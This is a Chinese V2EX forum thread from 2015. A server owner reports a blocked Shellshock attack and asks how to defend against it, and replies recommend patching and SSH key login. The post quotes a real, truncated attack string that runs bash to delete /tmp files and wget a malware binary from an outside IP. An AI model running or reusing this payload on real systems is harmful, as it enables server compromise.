V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
krytor
V2EX  ›  编程

安全问题 关于破壳攻击的

  •  
  •   krytor · 2015-06-23 16:36:24 +08:00 · 2703 次点击
    这是一个创建于 3439 天前的主题,其中的信息可能已经有所发展或是发生改变。

    问题:
    服务器被攻击 攻击url:
    x.x.x,x/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.186.30.161:1003/ok_xiaoma_32_64 -o /tmp/c...

    我的是阿里云
    centos 6.5
    攻击已经被阿里云给拦截了

    请问严重吗,我的密码也被暴利破解过,也被阿里云给挡住了。
    我该怎么做防护,杜绝这类攻击,谢谢。

    13 条回复    2015-06-24 06:50:18 +08:00
    krytor
        1
    krytor  
    OP
       2015-06-23 16:59:15 +08:00
    我给阿里云打了个电话,客服说装个杀毒软件,杀一下毒,装个安全狗啥的,好不好啊 -_-
    Septembers
        2
    Septembers  
       2015-06-23 17:09:24 +08:00
    @phoenixlzx archlinux 每天上去滚一次
    liuyi_beta
        3
    liuyi_beta  
       2015-06-23 17:16:50 +08:00
    话说你的是Linux/Unix 系统啊,客服竟然让你安装杀毒软件。。。 及时安装补丁就好了,另外登陆只用证书就好了,关掉密码登陆,将端口改到不常用端口,网站的话可以考虑安装安全狗。
    pwinner
        4
    pwinner  
       2015-06-23 17:25:48 +08:00 via Android
    杀毒软件。。你在说calm av么233
    只用证书登录就安全多啦
    virusdefender
        5
    virusdefender  
       2015-06-23 18:55:02 +08:00
    这个只是扫描而已 如果服务器不存在漏洞可以不用管
    phy25
        6
    phy25  
       2015-06-23 21:03:33 +08:00
    然而你暴露了一个地址 http://222.186.30.161:1003/ 可以拿它来做什么呢 :doge:
    krytor
        7
    krytor  
    OP
       2015-06-23 22:55:46 +08:00
    @Septembers 啥意思啊
    krytor
        8
    krytor  
    OP
       2015-06-23 22:56:24 +08:00
    @pwinner 是和 aws似得那样的证书吗,阿里没提供啊
    krytor
        9
    krytor  
    OP
       2015-06-23 22:57:09 +08:00
    @virusdefender 是给我网站上传可执行文件 ,这个 http://222.186.30.161:1003/ok_xiaoma_32_64
    krytor
        10
    krytor  
    OP
       2015-06-23 22:57:43 +08:00
    @phy25 这就是那条狗 给我服务器上传可执行文件
    lk09364
        11
    lk09364  
       2015-06-23 23:10:06 +08:00
    > 我该怎么做防护,杜绝这类攻击,谢谢。
    上面提到了——关键字: ssh证书登录
    krytor
        12
    krytor  
    OP
       2015-06-23 23:53:33 +08:00
    @lk09364 奥 多谢, 我见aws都是ssh登陆,我想理解的是 上面那个攻击的目的是什么,获取root权限吗
    pwinner
        13
    pwinner  
       2015-06-24 06:50:18 +08:00 via Android
    @krytor 这不是废话么。。有权限你就是肉鸡了。。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   949 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 21:30 · PVG 05:30 · LAX 13:30 · JFK 16:30
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.